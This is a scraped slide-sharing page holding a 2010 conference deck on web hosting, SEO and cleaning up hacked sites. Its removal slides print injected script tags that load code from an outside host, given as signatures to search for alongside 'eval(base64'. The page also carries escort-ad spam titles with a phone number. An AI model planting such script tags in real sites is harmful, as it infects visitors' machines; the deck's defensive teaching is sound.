The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 

2010 11 pubcon_hendison-hosting

  • 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  • 2. About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  • 3. Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
  • 4. Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
  • 5. But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
  • 7. Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
  • 8. Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
  • 10. Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
  • 12. Warnings in the SERPS!
  • 14. #1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
  • 15. Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
  • 18. Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
  • 20. Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
  • 21. Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  • 23. Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
  • 24. Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
  • 25. Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
  • 26. Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
  • 27. Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
  • 32. Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
  • 33. Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
  • 34. Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com